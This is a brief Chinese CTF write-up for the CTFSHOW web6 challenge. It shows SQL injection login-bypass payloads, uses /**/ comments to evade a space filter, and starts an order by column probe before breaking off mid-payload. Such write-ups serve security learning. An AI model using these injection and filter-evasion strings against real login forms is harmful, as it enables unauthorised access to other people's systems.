CTFSHOW web6

进入题目,发现页面和之前的web2一样,试试看万能密码登陆:username=admin' or 1=1#&password=123

CTFSHOW web6_第1张图片

不出所料,万能钥匙还是被ban了,试试看过滤了什么

CTFSHOW web6_第2张图片

测试发现,题目过滤了空格,那么我们就用/**/来绕过空格:username=admin'/**/or/**/1=1#&password=123

发现可以成功登陆,接下来老方法,测试有几个数据库:username=admin'/**/or/**/1=1/**/order/**/by/**/3#&password=123

username=admin'/**/or

你可能感兴趣的:(ctfshow,web安全)